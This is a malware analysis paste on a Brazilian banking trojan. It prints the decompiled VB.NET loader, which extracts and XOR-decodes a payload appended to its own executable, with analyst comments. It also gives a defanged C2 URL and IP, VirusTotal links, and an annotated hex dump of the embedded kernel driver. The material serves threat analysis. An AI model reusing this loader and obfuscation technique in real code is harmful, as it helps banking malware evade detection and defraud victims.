
BraziL BankTrojan VB.NET w/Embed bins 37MB

MalwareMustDie Jan 30th, 2016 (edited) 630 Never
  1. // #MalwareMustDie - Case: Brazil Bank Trojan w/size 37MB
  2. // It is a VB.NET executable with an embedded binary.
  3. // callback to:
  4. // GET HTTP/1.1
  5. // h00p://contador.blackmagictwo.com/visualizar/fix.php
  6.    {
  7.      "ip": "200.98.201.148",
  8.      "ptr": "200-98-201-148.clouduol.com.br",
  9.      "country": "BR",
  10.      "loc": "-23.5477,-46.6358",
  11.      "org": "AS7162 Universo Online S.A.",
  12.      "prf": "200.98.192.0/18 uol.com.br"
  13.    }
  14. // picref: https://twitter.com/MalwareMustDie/status/693641189648572416 (read full thread)
  15. // Sample (2)
  16.    https://www.virustotal.com/en/file/57a2dd99dd0c153a45b52f065645a8953b8a8fcef97a6c3538a4de166f845474/analysis/1454211673/
  17.    https://www.virustotal.com/en/file/887b3c737be52c594c12b564269bad659d9f8a37624bf6a624857d0735fc973c/analysis/1454219912/
  18.  
  19. // JINXED MALCODE BIN LOADER
  20.  
  21. // Toiusx.saojoao.Program
  // Entry point: only starts Form2's BackgroundWorker asynchronously (presumably wired to BackgroundWorker1_DoWork below -- the wiring is not shown here).
  22. public static void Main()
  23.  {  MyProject.Forms.Form2.BackgroundWorker1.RunWorkerAsync();}
  24.  
  // Form1's Load handler re-enters Program.Main, so merely showing the form (re)starts the worker.
  25. private void Form1_Load(object sender, EventArgs e)
  26.   {Program.Main();}
  27.  
  // Worker body: a single call to WHATEVER() (jinxed name; presumably the loader method right below -- confirm in the assembly).
  28. private void BackgroundWorker1_DoWork(object sender, DoWorkEventArgs e)
  29.   {this.WHATEVER();}
  30.  
  // Self-extracting loader (method name jinxed by the analyst).
  // 1. Reads its own executable from disk as text and splits it on the delimiter held in Settings.tamp;
  //    the second piece (array[1]) is the encoded payload appended to the binary.
  // 2. Decodes it by reflection: the System.Convert method name is concatenated at run time from two
  //    form fields (var1 + var2), so no decode-method name appears as a literal in the code --
  //    presumably a Base64 decode; confirm against the form's resource values.
  // 3. Hands the bytes plus a key string built from two more form fields (var13 + var14) to READ_BYTES,
  //    then to Bolhax (not shown in this paste).
  // Detection angle: a .NET process reading Application.ExecutablePath and invoking Convert via GetMethod().Invoke.
  31. public void MMD-NAil3dYourC0de()
  32.  {  string[] array = Strings.Split(File.ReadAllText(Application.ExecutablePath),\\
  33.                      MySettingsProperty.Settings.tamp, -1, CompareMethod.Binary);
  34.     byte[] fosga = (byte[])typeof(Convert).GetMethod(this.var1.Text + this.var2.Text).\\
  35.                     Invoke(null, new object[]{array[1]});
  36.     Form1.Bolhax(Form1.READ_BYTES(fosga, this.var13.Text + this.var14.Text));  }
  37.  
  // Payload decoder: XOR of the (reversed) payload against a rolling key.
  //   fosga - encoded payload; it is reversed IN PLACE, so the caller's array is mutated
  //   ximu  - key string, converted to bytes with the system default code page (result is code-page dependent)
  // Returns a buffer one byte longer than the input; the extra last byte is never written and stays 0.
  // The key index advances by Settings.rip each round and resets to 0 when it equals bytes.Length - rip;
  // the key array itself is flipped every round, so consecutive rounds read it in alternating orientation.
  // Empty input throws (fosga[-1]); if rip never lands exactly on bytes.Length - rip the index runs past
  // the key and throws too -- both depend on the settings value, which is not visible here.
  38. public static byte[] READ_BYTES(byte[] fosga, string ximu)
  39.  {  Array.Reverse(fosga);                              // in-place: caller's array is mutated
  40.     checked
  41.      {
  42.       byte b = fosga[fosga.Length - 1];                 // after the reverse this is the payload's original first byte; XORed into every output byte
  43.       byte[] bytes = Encoding.Default.GetBytes(ximu);   // key bytes
  44.       byte[] array = new byte[fosga.Length + 1];        // one spare byte: array[fosga.Length] is left 0
  45.       int num = 0;                                      // current key index
  46.       int arg_30_0 = 0;
  47.       int num2 = fosga.Length - 1;
  48.       for (int i = arg_30_0; i <= num2; i++)
  49.         {  array[i] = (fosga[i] ^ b ^ bytes[num]);
  50.        Array.Reverse(bytes);                             // key flipped every round
  51.        if ((double)num == unchecked((double)bytes.Length - Conversions.ToDouble(MySettingsProperty.Settings.rip)))
  52.         {num = 0;}                                      // wrap
  53.        else
  54.         {num = (int)Math.Round(unchecked((double)num + Conversions.ToDouble(MySettingsProperty.Settings.rip)));}  // step by rip
  55.         } return array;}}
  56.  
  57. // The data is actually a PE (no file) and is a malicious driver:
  58.    https://www.virustotal.com/en/file/e547aeb12345c226d24406ba751e9cb0f95a98b167b8eee5bacc370fc09d56e3/analysis/1454217852/
  59.  
  60. 00000000  4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|
  61. 00000010  b8 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00  |........@.......|
  62. 00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  63. 00000030  00 00 00 00 00 00 00 00  00 00 00 00 c8 00 00 00  |................|
  64. 00000040  0e 1f ba 0e 00 b4 09 cd  21 b8 01 4c cd 21 54 68  |........!..L.!Th|
  65. 00000050  69 73 20 70 72 6f 67 72  61 6d 20 63 61 6e 6e 6f  |is program canno|
  66. 00000060  74 20 62 65 20 72 75 6e  20 69 6e 20 44 4f 53 20  |t be run in DOS |
  67. 00000070  6d 6f 64 65 2e 0d 0d 0a  24 00 00 00 00 00 00 00  |mode....$.......|
  68. 00000080  9b a7 2f 92 df c6 41 c1  df c6 41 c1 df c6 41 c1  |../...A...A...A.|
  69. 00000090  df c6 40 c1 d3 c6 41 c1  d6 be d2 c1 dc c6 41 c1  |..@...A.......A.|
  70. 000000a0  d6 be d4 c1 dd c6 41 c1  d6 be c2 c1 d9 c6 41 c1  |......A.......A.|
  71. 000000b0  d6 be d0 c1 de c6 41 c1  52 69 63 68 df c6 41 c1  |......A.Rich..A.|
  72. 000000c0  00 00 00 00 00 00 00 00  50 45 00 00 4c 01 05 00  |........PE..L...|
  73. 000000d0  15 52 5a 56 00 00 00 00  00 00 00 00 e0 00 02 01  |.RZV............|
  74. 000000e0  0b 01 09 00 00 0c 00 00  00 06 00 00 00 00 00 00  |................|
  75. 000000f0  3e 40 00 00 00 10 00 00  00 20 00 00 00 00 01 00  |>@....... ......|
  76. 00000100  00 10 00 00 00 02 00 00  06 00 01 00 06 00 01 00  |................|
  77. 00000110  06 00 01 00 00 00 00 00  00 60 00 00 00 04 00 00  |.........`......|
  78. 00000120  52 78 00 00 01 00 00 00  00 00 04 00 00 10 00 00  |Rx..............|
  79. 00000130  00 00 10 00 00 10 00 00  00 00 00 00 10 00 00 00  |................|
  80. 00000140  00 00 00 00 00 00 00 00  50 40 00 00 28 00 00 00  |........P@..(...|
  81. 00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  82. 00000160  00 00 00 00 00 00 00 00  00 50 00 00 94 00 00 00  |.........P......|
  83. 00000170  40 20 00 00 1c 00 00 00  00 00 00 00 00 00 00 00  |@ ..............|
  84. 00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  85. 00000190  60 20 00 00 40 00 00 00  00 00 00 00 00 00 00 00  |` ..@...........|
  86. 000001a0  00 20 00 00 34 00 00 00  00 00 00 00 00 00 00 00  |. ..4...........|
  87. 000001b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  88. 000001c0  2e 74 65 78 74 00 00 00  30 08 00 00 00 10 00 00  |.text...0.......|
  89. 000001d0  00 0a 00 00 00 04 00 00  00 00 00 00 00 00 00 00  |................|
  90. 000001e0  00 00 00 00 20 00 00 68  2e 72 64 61 74 61 00 00  |.... ..h.rdata..|
  91. 000001f0  34 01 00 00 00 20 00 00  00 02 00 00 00 0e 00 00  |4.... ..........|
  92. 00000200  00 00 00 00 00 00 00 00  00 00 00 00 40 00 00 48  |............@..H|
  93. 00000210  2e 64 61 74 61 00 00 00  38 00 00 00 00 30 00 00  |.data...8....0..|
  94. 00000220  00 02 00 00 00 10 00 00  00 00 00 00 00 00 00 00  |................|
  95. 00000230  00 00 00 00 40 00 00 c8  49 4e 49 54 00 00 00 00  |....@...INIT....|
  96. 00000240  90 01 00 00 00 40 00 00  00 02 00 00 00 12 00 00  |.....@..........|
  97. 00000250  00 00 00 00 00 00 00 00  00 00 00 00 20 00 00 e2  |............ ...|
  98. 00000260  2e 72 65 6c 6f 63 00 00  b6 00 00 00 00 50 00 00  |.reloc.......P..|
  99. 00000270  00 02 00 00 00 14 00 00  00 00 00 00 00 00 00 00  |................|
  100. 00000280  00 00 00 00 40 00 00 42  00 00 00 00 00 00 00 00  |....@..B........|
  101. 00000290  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  102. 00000410  8b ff 55 8b ec 83 ec 0c  c7 45 f4 10 17 01 00 8b  |..U......E......|
  103. 00000420  45 f4 50 8d 4d f8 51 ff  15 04 20 01 00 8d 55 f8  |E.P.M.Q... ...U.|
  104. 00000430  52 ff 15 00 20 01 00 8b  e5 5d c3 cc cc cc cc cc  |R... ....]......|
  105. 00000440  8b ff 55 8b ec 83 ec 0c  c7 45 f4 40 17 01 00 8b  |..U......E.@....|
  106. 00000450  45 f4 50 8d 4d f8 51 ff  15 04 20 01 00 8d 55 f8  |E.P.M.Q... ...U.|
  107. 00000460  52 ff 15 00 20 01 00 8b  e5 5d c3 cc cc cc cc cc  |R... ....]......|
  108. 00000470  8b ff 55 8b ec 6a fe 68  18 21 01 00 68 d0 13 01  |..U..j.h.!..h...|
  109. 00000480  00 64 a1 00 00 00 00 50  81 c4 cc fd ff ff 53 56  |.d.....P......SV|
  110. 00000490  57 a1 00 30 01 00 31 45  f8 33 c5 50 8d 45 f0 64  |W..0..1E.3.P.E.d|
  111. 000004a0  a3 00 00 00 00 89 65 e8  8b 45 0c 50 e8 ff 01 00  |......e..E.P....|
  112. 000004b0  00 89 85 d4 fd ff ff 8b  8d d4 fd ff ff 8b 51 08  |..............Q.|
  113. 000004c0  89 95 cc fd ff ff 8b 45  0c 8b 48 0c 89 4d e0 8b  |.......E..H..M..|
  114. 000004d0  55 0c c7 42 1c 00 00 00  00 8b 85 d4 fd ff ff 8a  |U..B............|
  115. 000004e0  08 88 8d c0 fd ff ff 80  bd c0 fd ff ff 0e 74 05  |..............t.|
  116. 000004f0  e9 72 01 00 00 8b 95 d4  fd ff ff 8b 42 0c 89 85  |.r..........B...|
  117. 00000500  bc fd ff ff 81 bd bc fd  ff ff 04 40 22 00 74 25  |...........@ .t%|
  118. 00000510  81 bd bc fd ff ff 0c 40  22 00 0f 84 a9 00 00 00  |.......@".......|
  119. 00000520  81 bd bc fd ff ff 14 40  22 00 0f 84 e2 00 00 00  |.......@".......|
  120. 00000530  e9 26 01 00 00 83 bd cc  fd ff ff 0c 72 7c 8b 4d  |.&..........r|.M|
  121. 00000540  e0 89 4d e4 c7 45 fc 00  00 00 00 6a 01 8b 55 e4  |..M..E.....j..U.|
  122. 00000550  8b 42 08 50 8b 4d e4 8b  11 52 ff 15 0c 20 01 00  |.B.P.M...R... ..|
  123. 00000560  8b 45 e4 8b 48 08 51 8b  55 e4 8b 42 04 50 8b 4d  |.E..H.Q.U..B.P.M|
  124. 00000570  e4 8b 11 52 e8 b1 03 00  00 83 c4 0c c7 85 c8 fd  |...R............|
  125. 00000580  ff ff 00 00 00 00 c7 45  fc fe ff ff ff eb 29 8b  |.......E......).|
  126. 00000590  45 ec 8b 08 8b 11 89 95  c4 fd ff ff b8 01 00 00  |E...............|
  127. 000005a0  00 c3 8b 65 e8 8b 85 c4  fd ff ff 89 85 c8 fd ff  |...e............|
  128. 000005b0  ff c7 45 fc fe ff ff ff  eb 0a c7 85 c8 fd ff ff  |..E.............|
  129. 000005c0  23 00 00 c0 e9 9c 00 00  00 83 3d 1c 30 01 00 00  |#.........=.0...|
  130. 000005d0  75 0a e8 39 fe ff ff a3  1c 30 01 00 83 3d 1c 30  |u..9.....0...=.0|
  131. 000005e0  01 00 00 74 21 8b 4d e0  8b 15 1c 30 01 00 89 11  |...t!.M....0....|
  132. 000005f0  8b 45 0c c7 40 1c 04 00  00 00 c7 85 c8 fd ff ff  |.E..@...........|
  133. 00000600  00 00 00 00 eb 0a c7 85  c8 fd ff ff 8c 02 00 c0  |................|
  134. 00000610  eb 53 83 3d 20 30 01 00  00 75 0a e8 20 fe ff ff  |.S.= 0...u.. ...|
  135. 00000620  a3 20 30 01 00 83 3d 20  30 01 00 00 74 21 8b 4d  |. 0...= 0...t!.M|
  136. 00000630  e0 8b 15 20 30 01 00 89  11 8b 45 0c c7 40 1c 04  |... 0.....E..@..|
  137. 00000640  00 00 00 c7 85 c8 fd ff  ff 00 00 00 00 eb 0a c7  |................|
  138. 00000650  85 c8 fd ff ff 8c 02 00  c0 eb 0a c7 85 c8 fd ff  |................|
  139. 00000660  ff 10 00 00 c0 eb 0a c7  85 c8 fd ff ff 00 00 00  |................|
  140. 00000670  00 8b 4d 0c 8b 95 c8 fd  ff ff 89 51 18 32 d2 8b  |..M........Q.2..|
  141. 00000680  4d 0c ff 15 08 20 01 00  33 c0 8b 4d f0 64 89 0d  |M.... ..3..M.d..|
  142. 00000690  00 00 00 00 59 5f 5e 5b  8b e5 5d c2 08 00 cc cc  |....Y_^[..].....|
  143. 000006a0  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
  144. 000006b0  8b ff 55 8b ec 51 8b 45  08 0f be 48 23 8b 55 08  |..U..Q.E...H#.U.|
  145. 000006c0  0f be 42 22 83 c0 01 3b  c8 7e 20 6a 00 68 15 5b  |..B....;.~ j.h.[|
  146. 000006d0  00 00 68 b0 17 01 00 68  80 17 01 00 ff 15 14 20  |..h....h....... |
  147. 000006e0  01 00 c7 45 fc 00 00 00  00 eb 07 c7 45 fc 01 00  |...E........E...|
  148. 000006f0  00 00 8b 4d 08 8b 41 60  8b e5 5d c2 04 00 cc cc  |...M..A`..].....|
  149. 00000700  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
  150. 00000710  8b ff 55 8b ec 83 ec 0c  c7 45 f4 10 18 01 00 c7  |..U......E......|
  151. 00000720  45 f8 e0 17 01 00 8b 45  f4 50 68 28 30 01 00 ff  |E......E.Ph(0...|
  152. 00000730  15 04 20 01 00 8b 4d f8  51 68 30 30 01 00 ff 15  |.. ...M.Qh00....|
  153. 00000740  04 20 01 00 68 18 30 01  00 6a 00 6a 00 6a 15 68  |. ..h.0..j.j.j.h|
  154. 00000750  28 30 01 00 6a 00 8b 55  08 52 ff 15 20 20 01 00  |(0..j..U.R..  ..|
  155. 00000760  89 45 fc 83 7d fc 00 7c  4a 68 28 30 01 00 68 30  |.E..}..|Jh(0..h0|
  156. 00000770  30 01 00 ff 15 1c 20 01  00 89 45 fc 83 7d fc 00  |0..... ...E..}..|
  157. 00000780  7c 24 8b 45 08 c7 40 70  70 10 01 00 8b 4d 08 8b  ||$.E..@pp....M..|
  158. 00000790  55 08 8b 42 70 89 41 40  8b 4d 08 8b 55 08 8b 42  |U..Bp.A@.M..U..B|
  159. 000007a0  40 89 41 38 eb 0d 8b 0d  18 30 01 00 51 ff 15 18  |@.A8.....0..Q...|
  160. 000007b0  20 01 00 8b 45 fc 8b e5  5d c2 08 00 cc cc cc cc  | ...E...].......|
  161. 000007c0  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
  162. 000007d0  8b ff 55 8b ec 83 ec 14  53 8b 5d 0c 56 8b 73 08  |..U.....S.].V.s.|
  163. 000007e0  33 35 00 30 01 00 57 8b  06 c6 45 ff 00 c7 45 f8  |35.0..W...E...E.|
  164. 000007f0  01 00 00 00 8d 7b 10 83  f8 fe 74 0d 8b 4e 04 03  |.....{....t..N..|
  165. 00000800  cf 33 0c 38 e8 c2 02 00  00 8b 4e 0c 8b 46 08 03  |.3.8......N..F..|
  166. 00000810  cf 33 0c 38 e8 b2 02 00  00 8b 45 08 f6 40 04 66  |.3.8......E..@.f|
  167. 00000820  0f 85 e2 00 00 00 8b 4d  10 8d 55 ec 89 53 fc 8b  |.......M..U..S..|
  168. 00000830  5b 0c 89 45 ec 89 4d f0  83 fb fe 74 5f 8d 49 00  |[..E..M....t_.I.|
  169. 00000840  8d 04 5b 8b 4c 86 14 8d  44 86 10 89 45 f4 8b 00  |..[.L...D...E...|
  170. 00000850  89 45 08 85 c9 74 14 8b  d7 e8 cc 01 00 00 c6 45  |.E...t.........E|
  171. 00000860  ff 01 85 c0 7c 40 7f 47  8b 45 08 8b d8 83 f8 fe  |....|@.G.E......|
  172. 00000870  75 ce 80 7d ff 00 74 24  8b 06 83 f8 fe 74 0d 8b  |u..}..t$.....t..|
  173. 00000880  4e 04 03 cf 33 0c 38 e8  3f 02 00 00 8b 4e 0c 8b  |N...3.8.?....N..|
  174. 00000890  56 08 03 cf 33 0c 3a e8  2f 02 00 00 8b 45 f8 5f  |V...3.:./....E._|
  175. 000008a0  5e 5b 8b e5 5d c3 c7 45  f8 00 00 00 00 eb c9 8b  |^[..]..E........|
  176. 000008b0  4d 0c e8 a3 01 00 00 8b  45 0c 39 58 0c 74 12 68  |M.......E.9X.t.h|
  177. 000008c0  00 30 01 00 57 8b d3 8b  c8 e8 a6 01 00 00 8b 45  |.0..W..........E|
  178. 000008d0  0c 8b 4d 08 89 48 0c 8b  06 83 f8 fe 74 0d 8b 4e  |..M..H......t..N|
  179. 000008e0  04 03 cf 33 0c 38 e8 e0  01 00 00 8b 4e 0c 8b 56  |...3.8......N..V|
  180. 000008f0  08 03 cf 33 0c 3a e8 d0  01 00 00 8b 45 f4 8b 48  |...3.:......E..H|
  181. 00000900  08 8b d7 e8 39 01 00 00  ba fe ff ff ff 39 53 0c  |....9........9S.|
  182. 00000910  74 8a 68 00 30 01 00 57  8b cb e8 55 01 00 00 e9  |t.h.0..W...U....|
  183. 00000920  54 ff ff ff cc cc cc cc  cc cc ff 25 10 20 01 00  |T..........%. ..|
  184. 00000930  cc cc cc cc cc cc cc cc  53 56 57 8b 54 24 10 8b  |........SVW.T$..|
  185. 00000940  44 24 14 8b 4c 24 18 55  52 50 51 51 68 c8 15 01  |D$..L$.URPQQh...|
  186. 00000950  00 64 ff 35 00 00 00 00  a1 00 30 01 00 33 c4 89  |.d.5......0..3..|
  187. 00000960  44 24 08 64 89 25 00 00  00 00 8b 44 24 30 8b 58  |D$.d.%.....D$0.X|
  188. 00000970  08 8b 4c 24 2c 33 19 8b  70 0c 83 fe fe 74 3b 8b  |..L$,3..p....t;.|
  189. 00000980  54 24 34 83 fa fe 74 04  3b f2 76 2e 8d 34 76 8d  |T$4...t.;.v..4v.|
  190. 00000990  5c b3 10 8b 0b 89 48 0c  83 7b 04 00 75 cc 68 01  |\.....H..{..u.h.|
  191. 000009a0  01 00 00 8b 43 08 e8 ee  00 00 00 b9 01 00 00 00  |....C...........|
  192. 000009b0  8b 43 08 e8 00 01 00 00  eb b0 64 8f 05 00 00 00  |.C........d.....|
  193. 000009c0  00 83 c4 18 5f 5e 5b c3  8b 4c 24 04 f7 41 04 06  |...._^[..L$..A..|
  194. 000009d0  00 00 00 b8 01 00 00 00  74 33 8b 44 24 08 8b 48  |........t3.D$..H|
  195. 000009e0  08 33 c8 e8 e3 00 00 00  55 8b 68 18 ff 70 0c ff  |.3......U.h..p..|
  196. 000009f0  70 10 ff 70 14 e8 3e ff  ff ff 83 c4 0c 5d 8b 44  |p..p..>......].D|
  197. 00000a00  24 08 8b 54 24 10 89 02  b8 03 00 00 00 c3 55 8b  |$..T$.........U.|
  198. 00000a10  4c 24 08 8b 29 ff 71 1c  ff 71 18 ff 71 28 e8 15  |L$..).q..q..q(..|
  199. 00000a20  ff ff ff 83 c4 0c 5d c2  04 00 55 56 57 53 8b ea  |......]...UVWS..|
  200. 00000a30  33 c0 33 db 33 d2 33 f6  33 ff ff d1 5b 5f 5e 5d  |3.3.3.3.3...[_^]|
  201. 00000a40  c3 8b ea 8b f1 8b c1 6a  01 e8 4b 00 00 00 33 c0  |.......j..K...3.|
  202. 00000a50  33 db 33 c9 33 d2 33 ff  ff e6 55 8b ec 53 56 57  |3.3.3.3...U..SVW|
  203. 00000a60  6a 00 6a 00 68 6f 16 01  00 51 e8 51 00 00 00 5f  |j.j.ho...Q.Q..._|
  204. 00000a70  5e 5b 5d c3 55 8b 6c 24  08 52 51 ff 74 24 14 e8  |^[].U.l$.RQ.t$..|
  205. 00000a80  b4 fe ff ff 83 c4 0c 5d  c2 08 00 cc cc cc cc cc  |.......]........|
  206. 00000a90  53 51 bb 08 30 01 00 eb  0b 53 51 bb 08 30 01 00  |SQ..0....SQ..0..|
  207. 00000aa0  8b 4c 24 0c 89 4b 08 89  43 04 89 6b 0c 55 51 50  |.L$..K..C..k.UQP|
  208. 00000ab0  58 59 5d 59 5b c2 04 00  ff d0 c3 cc cc cc cc cc  |XY]Y[...........|
  209. 00000ac0  ff 25 28 20 01 00 cc cc  cc cc cc 3b 0d 00 30 01  |.%( .......;..0.|
  210. 00000ad0  00 75 03 c2 00 00 e9 05  00 00 00 cc cc cc cc cc  |.u..............|
  211. 00000ae0  8b ff 55 8b ec 51 89 4d  fc 6a 00 ff 35 04 30 01  |..U..Q.M.j..5.0.|
  212. 00000af0  00 ff 35 00 30 01 00 ff  75 fc 68 f7 00 00 00 ff  |..5.0...u.h.....|
  213. 00000b00  15 2c 20 01 00 cc cc cc  cc cc cc cc cc cc cc cc  |., .............|
  214. ---------------------------------------------------------------------------------------------
  215. 00000b10  50 00 73 00 47 00 65 00  74 00 43 00 75 00 72 00  |P.s.G.e.t.C.u.r.| PsGetCurrentThreadId
  216. 00000b20  72 00 65 00 6e 00 74 00  54 00 68 00 72 00 65 00  |r.e.n.t.T.h.r.e.| RtlInitUnicodeString(&DestinationString, L"PsGetCurrentThreadId");
  217. 00000b30  61 00 64 00 49 00 64 00  00 00 cc cc cc cc cc cc  |a.d.I.d.........| return MmGetSystemRoutineAddress(&DestinationString);
  218. ---------------------------------------------------------------------------------------------
  219. 00000b40  50 00 73 00 47 00 65 00  74 00 43 00 75 00 72 00  |P.s.G.e.t.C.u.r.| PsGetCurrentThreadProcessId
  220. 00000b50  72 00 65 00 6e 00 74 00  54 00 68 00 72 00 65 00  |r.e.n.t.T.h.r.e.|
  221. 00000b60  61 00 64 00 50 00 72 00  6f 00 63 00 65 00 73 00  |a.d.P.r.o.c.e.s.| RtlInitUnicodeString(&DestinationString, L"PsGetCurrentThreadProcessId");
  222. 00000b70  73 00 49 00 64 00 00 00  cc cc cc cc cc cc cc cc  |s.I.d...........| return MmGetSystemRoutineAddress(&DestinationString);
  223. ---------------------------------------------------------------------------------------------
  224. 00000b80  49 72 70 2d 3e 43 75 72  72 65 6e 74 4c 6f 63 61  |Irp->CurrentLoca| c:\winddk\7600.16385.1\inc\ddk\wdm.h
  225. 00000b90  74 69 6f 6e 20 3c 3d 20  49 72 70 2d 3e 53 74 61  |tion <= Irp->Sta|
  226. 00000ba0  63 6b 43 6f 75 6e 74 20  2b 20 31 00 cc cc cc cc  |ckCount + 1.....|
  227. 00000bb0  63 3a 5c 77 69 6e 64 64  6b 5c 37 36 30 30 2e 31  |c:\winddk\7600.1|
  228. 00000bc0  36 33 38 35 2e 31 5c 69  6e 63 5c 64 64 6b 5c 77  |6385.1\inc\ddk\w|
  229. 00000bd0  64 6d 2e 68 00 cc cc cc  cc cc cc cc cc cc cc cc  |dm.h............|
  230. //////////////////////////////////// my memo@unixfreaxjp //////////////////////////////////////
  231. RtlAssert("Irp->CurrentLocation <= Irp->StackCount + 1", "c:\\winddk\\7600.16385.1\\inc\\ddk\\wdm.h", %d, 0); return *(_DWORD *)(%var + 96);
  232. //////////////////////////////////// my memo@unixfreaxjp //////////////////////////////////////
  233. ---------------------------------------------------------------------------------------------
  234. 00000be0  5c 00 44 00 6f 00 73 00  44 00 65 00 76 00 69 00  |\.D.o.s.D.e.v.i.| \DosDevices\hookmgr
  235. 00000bf0  63 00 65 00 73 00 5c 00  68 00 6f 00 6f 00 6b 00  |c.e.s.\.h.o.o.k.| RtlInitUnicodeString(&stru_13030, L"\\DosDevices\\hookmgr");
  236. 00000c00  6d 00 67 00 72 00 00 00  cc cc cc cc cc cc cc cc  |m.g.r...........|
  237. ---------------------------------------------------------------------------------------------
  238. 00000c10  5c 00 44 00 65 00 76 00  69 00 63 00 65 00 5c 00  |\.D.e.v.i.c.e.\.| \Device\hookmgr
  239. 00000c20  68 00 6f 00 6f 00 6b 00  6d 00 67 00 72 00 00 00  |h.o.o.k.m.g.r...| RtlInitUnicodeString(&DestinationString, L"\\Device\\hookmgr");
  240. 00000c30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  241. 00000e00  ac 40 00 00 c8 40 00 00  e0 40 00 00 f6 40 00 00  |.@...@...@...@..|
  242. 00000e10  06 41 00 00 10 41 00 00  1c 41 00 00 2e 41 00 00  |.A...A...A...A..| 0x11310
  243. 00000e20  46 41 00 00 58 41 00 00  74 41 00 00 80 41 00 00  |FA..XA..tA...A..| DeviceObj =
  244. 00000e30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| IoCreateDevice(DriverObject, 0,
  245. 00000e40  00 00 00 00 15 52 5a 56  00 00 00 00 02 00 00 00  |.....RZV........| &DestinationString, %d, 0, 0, &DeviceObject);
  246. 00000e50  5c 00 00 00 a8 20 00 00  a8 0e 00 00 00 00 00 00  |\.... ..........|
  247. 00000e60  48 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |H...............|
  248. 00000e70  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  249. 00000e90  00 00 00 00 00 00 00 00  00 00 00 00 00 30 01 00  |.............0..|
  250. 00000ea0  10 21 01 00 02 00 00 00  52 53 44 53 46 e6 2e db  |.!......RSDSF...|
  251. 00000eb0  7b 74 f7 4e 8d 83 34 2d  26 1f 8f 6e 01 00 00 00  |{t.N..4-&..n....|
  252. ---------------------------------------------------------------------------------------------
  253. 00000ec0  63 3a 5c 75 73 65 72 73  5c 61 64 6d 69 6e 5c 61  |c:\users\admin\a|
  254. 00000ed0  70 70 64 61 74 61 5c 72  6f 61 6d 69 6e 67 5c 78  |ppdata\roaming\x|  A LOL
  255. 00000ee0  38 36 5c 6f 62 6a 63 68  6b 5f 77 69 6e 37 5f 78  |86\objchk_win7_x|  pdb :-P)
  256. 00000ef0  38 36 5c 69 33 38 36 5c  68 6f 6f 6b 6d 67 72 2e  |86\i386\hookmgr.|
  257. 00000f00  70 64 62 00 00 00 00 00  00 00 00 00 00 00 00 00  |pdb.............|
  258. ---------------------------------------------------------------------------------------------
  259. 00000f10  d0 13 00 00 c8 15 00 00  fe ff ff ff 00 00 00 00  |................|
  260. 00000f20  ac fd ff ff 00 00 00 00  fe ff ff ff 8f 11 01 00  |................|
  261. 00000f30  a2 11 01 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  262. 00000f40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  263. 00001000  4e e6 40 bb b1 19 bf 44  20 05 93 19 00 00 00 00  |N.@....D .......|
  264. 00001010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  265. 00001200  00 00 00 00 00 a1 00 30  01 00 b9 4e e6 40 bb 85  |.......0...N.@..|
  266. 00001210  c0 74 04 3b c1 75 1a a1  24 20 01 00 8b 00 35 00  |.t.;.u..$ ....5.|
  267. 00001220  30 01 00 a3 00 30 01 00  75 07 8b c1 a3 00 30 01  |0....0..u.....0.|
  268. 00001230  00 f7 d0 a3 04 30 01 00  c3 cc cc cc cc cc 8b ff  |.....0..........|
  269. 00001240  55 8b ec e8 bd ff ff ff  5d e9 c2 d2 ff ff cc cc  |U.......].......|
  270. 00001250  78 40 00 00 00 00 00 00  00 00 00 00 66 41 00 00  |x@..........fA..|
  271. 00001260  00 20 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |. ..............|
  272. 00001270  00 00 00 00 00 00 00 00  ac 40 00 00 c8 40 00 00  |.........@...@..|
  273. 00001280  e0 40 00 00 f6 40 00 00  06 41 00 00 10 41 00 00  |.@...@...A...A..|
  274. 00001290  1c 41 00 00 2e 41 00 00  46 41 00 00 58 41 00 00  |.A...A..FA..XA..|
  275. 000012a0  74 41 00 00 80 41 00 00  00 00 00 00 e6 03 4d 6d  |tA...A........Mm|
  276. 000012b0  47 65 74 53 79 73 74 65  6d 52 6f 75 74 69 6e 65  |GetSystemRoutine|
  277. 000012c0  41 64 64 72 65 73 73 00  ee 05 52 74 6c 49 6e 69  |Address...RtlIni|
  278. 000012d0  74 55 6e 69 63 6f 64 65  53 74 72 69 6e 67 00 00  |tUnicodeString..|
  279. 000012e0  ba 02 49 6f 66 43 6f 6d  70 6c 65 74 65 52 65 71  |..IofCompleteReq|
  280. 000012f0  75 65 73 74 00 00 dd 04  50 72 6f 62 65 46 6f 72  |uest....ProbeFor|
  281. 00001300  57 72 69 74 65 00 4b 08  6d 65 6d 63 70 79 00 00  |Write.K.memcpy..|
  282. 00001310  60 05 52 74 6c 41 73 73  65 72 74 00 fc 01 49 6f  |`.RtlAssert...Io|
  283. 00001320  44 65 6c 65 74 65 44 65  76 69 63 65 00 00 f1 01  |DeleteDevice....|
  284. 00001330  49 6f 43 72 65 61 74 65  53 79 6d 62 6f 6c 69 63  |IoCreateSymbolic|
  285. 00001340  4c 69 6e 6b 00 00 e7 01  49 6f 43 72 65 61 74 65  |Link....IoCreate|
  286. 00001350  44 65 76 69 63 65 00 00  9c 03 4b 65 54 69 63 6b  |Device....KeTick|
  287. 00001360  43 6f 75 6e 74 00 6e 74  6f 73 6b 72 6e 6c 2e 65  |Count.ntoskrnl.e|
  288. 00001370  78 65 00 00 90 06 52 74  6c 55 6e 77 69 6e 64 00  |xe....RtlUnwind.|
